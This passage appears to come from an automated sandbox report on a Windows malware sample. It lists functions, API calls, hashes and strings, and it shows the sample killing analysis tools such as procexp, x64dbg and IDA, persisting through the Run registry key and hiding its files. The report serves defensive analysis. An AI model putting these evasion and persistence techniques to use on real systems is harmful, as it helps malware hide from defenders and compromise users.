                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction ID: 1128876b946992ea1b84dfbd3045d8b15b392610cb310ee418bb019857f2b900
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c083718f08d0c72eded97b33700526ef96675f7b3bff10be0d6bfba5df6ede19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF81DC36609B8186EB50DF55F85436AA7A1FBC9B92F104235DACD83B68DF7CE4448B04
                                                                                                                                                                                                                        Function 00007FF6C5DB306C Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB4404: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB30A7), ref: 00007FF6C5DB444C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB4404: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB30A7), ref: 00007FF6C5DB4489
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB4404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB30A7), ref: 00007FF6C5DB4494
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3B44: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB30AC), ref: 00007FF6C5DB3B87
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3B44: RegSetValueExW.ADVAPI32 ref: 00007FF6C5DB3BBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3B44: RegCloseKey.ADVAPI32 ref: 00007FF6C5DB3BCC
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF6C5DB3BFC
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6C5DB3DF7
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: Process32FirstW.KERNEL32 ref: 00007FF6C5DB3E2A
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: CloseHandle.KERNEL32 ref: 00007FF6C5DB3E3C
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: wcscmp.MSVCRT ref: 00007FF6C5DB3E51
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: OpenProcess.KERNEL32 ref: 00007FF6C5DB3E67
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: TerminateProcess.KERNEL32 ref: 00007FF6C5DB3E8A
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: CloseHandle.KERNEL32 ref: 00007FF6C5DB3E98
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: Process32NextW.KERNEL32 ref: 00007FF6C5DB3EAB
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3DE4: CloseHandle.KERNEL32 ref: 00007FF6C5DB3EBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3974: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6C5DB3ACC), ref: 00007FF6C5DB39A4
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF6C5DB3156
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction ID: ba741d7c6110e94cbb952609c0f5b7bdccc1bf2dc409dd67293ba8b4bf8e2a86
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88214C20E5875291EA00FF64EC911F96623AF50F52F804732E4ADC22E6DE6EFD49D709
                                                                                                                                                                                                                        Function 00007FF6C5DB2DFC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction ID: 25b0b6cdf40e0ec9d754037aba97a3a39c4a6890e479046ad4cb95b6e4f96795
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38ee3acfd37bcc54bc171a250b67dee5856fd1290622cbb628fe660574ac1ff6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9901792690DB4281E720AF11EC542696762FB98F96F440735E9CEC6774CE3DF9C58608
                                                                                                                                                                                                                        Function 00007FF6C5DB3DE4 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction ID: f08d82d052f0fce638347638c65178371f6723f8b7601a8d401646dd48c3e148
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ff7261aa3a773e33927d72f78d727c784ebe6b86b23e25676c598a25c4e3fb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1219C31A0CA8681E770AF15EC5836A6362FBC4F56F504335C69E826A8DF3DE945DB04
                                                                                                                                                                                                                        Function 00007FF6C5DB2E9C Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction ID: 971b3c2f56f1ebce54b763817c09ead78b91d5353cdbb3dda4029c3695217750
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 375159da82b254cffee43355908740546a62a67f3f10456f7c5f5d243881e9da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2801882691DB8282E720AF21EC5422A6372FBD8F46F440735E9CEC6664CE3CE9858704
                                                                                                                                                                                                                        Function 00007FF6C5DB3CA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction ID: f8a3004e95cb4536b4617e743b66b73e74d31fa325fcb77ddfd6f11efc2af6ec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 70abf51bf9df583d0d42a88b51854933bbba50bd6965b6466e2bf9ea4c99219c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F31947661CBC485DB70AF19E8987AAB3A1F788B41F400225DA8DC3B68DF3CD594DB04
                                                                                                                                                                                                                        Function 00007FF6C5DB3B44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction ID: 74f4062e324a4d924c97660e1846f0c63e88079b31667b8fff822263a6482e5c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1c2a8b41111031194efcdec3dcba1c178604344d5892954ccdc9661288b0112
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC012536618B808ADB509F14E84471AB7B1F788B95F801225EBCD83B68DF7CD584CF08
                                                                                                                                                                                                                        Function 00007FF6C5DB13C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 17e4246b454d86a9ec9ff2dcbc477a0c577d5e65a717ed21ef58b5ae3961d49a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1012C6191C706C6E630AF50F84872973A1FB84B4AF804234D6CD82698DF3CE949CB09
                                                                                                                                                                                                                        Function 00007FF6C5DB3FC4 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction ID: 8ad30ac9b85da941eb618f93c9d0310b31e30ebe781b67fc531648643cd97fb6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 945e6c46026cac8d5227389c0b5a00d9d2c6e61c2b6681abe3b0584bd8c648a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3211DA71A0C78681E770AF11E88836A73A2FB84B96F004335D6DD82698DF3DE984DB04
                                                                                                                                                                                                                        Function 00007FF6C5DB3974 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction ID: daf68198b3d460fdcfcc9718d765c61eb4a9d28b3353eb8f6652543e9f9e4365
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d2af400ed1d53b821f5eb59e2e4f5bf11a65c77a1e5104fedf3b789aa3a2d8d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67116372528B8086D7909F14F84062A77A1FB84BA1F105330F9AE83BE8DF7CD485CB04
                                                                                                                                                                                                                        Function 00007FF6C5DB1088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 9bae4d9fde82d851bb8d1c3628467abac75d9b889708415cdb6d72ba0a21cad2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84E0ED2192CB86C2D660EF50FC5432973A1FB84B46F900234D5CD82664EF3CF989CB08
                                                                                                                                                                                                                        Function 00007FF6C5DB2F2C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C5DB3A69), ref: 00007FF6C5DB3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB4524: CreateFileW.KERNEL32 ref: 00007FF6C5DB456B
                                                                                                                                                                                                                          • Part of subcall function 00007FF6C5DB10D8: OpenProcess.KERNEL32 ref: 00007FF6C5DB10FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF6C5DB2FC7
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF6C5DB2FDA
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000007.00000002.1546894580.00007FF6C5DB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6C5DB0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546856059.00007FF6C5DB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546929950.00007FF6C5DB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546955753.00007FF6C5DB8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1546979918.00007FF6C5DB9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000007.00000002.1547003815.00007FF6C5DBB000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_7_2_7ff6c5db0000_2F409E82DCA61388941053.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                        • Opcode ID: 15d6fefc82c0193e12c752cbc5a593e68fb1e92f3234a397ae1e8610d6d43279
                                                                                                                                                                                                                        • Instruction ID: 5feb1054863da170313279e33938165495f4fbac0eebc413f16868219dcdb017
